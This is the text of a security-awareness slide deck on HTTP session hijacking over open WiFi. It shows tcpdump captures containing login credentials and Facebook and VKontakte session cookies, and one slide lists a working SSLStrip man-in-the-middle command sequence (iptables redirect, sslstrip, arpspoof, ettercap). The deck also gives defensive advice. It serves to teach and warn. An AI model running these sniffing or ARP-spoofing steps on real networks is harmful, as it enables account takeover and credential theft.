Download - Session hijacking for dummies
1
session hijackingfor dummies
Friedemann Wulff-WoestenWDCM Dresden
2
What is this all about?
• especially in the czech republic: unencrypted WiFi everywhere
• Facebookfor many people THE platform to communicate
• many mobile devices have Facebook Appseven more data = possibilities to attack
• problem: almost no one types https://browser always connects to Port 80
3
What is this all about?
• this is a serious security threat
• tools are freely available, no one cares
• Facebook ignores the problem
• Google went Full SSL
4
HTTP is stateless
• Request, Response
• Send username/password once
• Receive cookie
• Use cookie for all future requests
5
Cookies need to be kept secret
6
7
8
even better: WiFi
• Cookies shouted through the air
• Someone just has to start listening
imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80
tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes
[...]
17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50E..f.v@[email protected])!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort
[...]
9
let’s listen...
POST /login.php?login_attempt=1 HTTP/1.1Host: login.facebook.com
[email protected]&pass=ichmagdietu
10
Example: Request
HTTP/1.1 302 FoundLocation: http://www.facebook.com/home.php?Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly
11
Example: Response
12
Problem: AJAXgenerate session cookies without clicking anywhere
17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1Host: q63.queue.vk.comConnection: keep-aliveReferer: http://q63.queue.vk.com/q_frame.php?3Content-Length: 307Origin: http://q63.queue.vk.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1Content-Type: application/x-www-form-urlencodedAccept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: remixchk=5; remixlang=0;
remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840
13
tcpdump: В Контакте
21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254E.....@[email protected]@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1Host: 0.44.channel.facebook.comConnection: keep-aliveReferer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.jsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw;
sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952
14
tcpdump: Facebook
15
facebook.js changes
16
What can you do?
• always full SSL - type https:// in address bar
• click “Log out”(doesn't guarantee session is invalidated)
• use at least WPAII
• use a VPNe.g. https://webvpn.zih.tu-dresden.de/
17
Even worse
• Facebook-Like Button, Tweet-Buttons (included in many blogs - cookies sent with HTTP)
• dirty: active attack with SSLStrip(redirects every HTTPS request to HTTP)
sudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -l 1000ip route show | grep default | awk '{ print $3}'arpspoof <gatewayIP>ettercap -Tzq
18
Example: SSLStrip
19
http://wiki.eisenrah.com/wiki/Sessions
20
@cdine@codebutler
@eisenrah
@moxie__
21
Sources
• elmo and cookie monsterhttp://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg
• wireshark collagehttp://www.flickr.com/photos/43707902@N04/4022449442/http://www.flickr.com/photos/43707902@N04/4022445684/http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png
• wireshark screenshothttp://dump.taylor-hughes.com/wireshark-tadalist.png
• firesheep facebook.js screenshothttp://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/NWl1KI5PCWA/s1600/Screenshot-9.png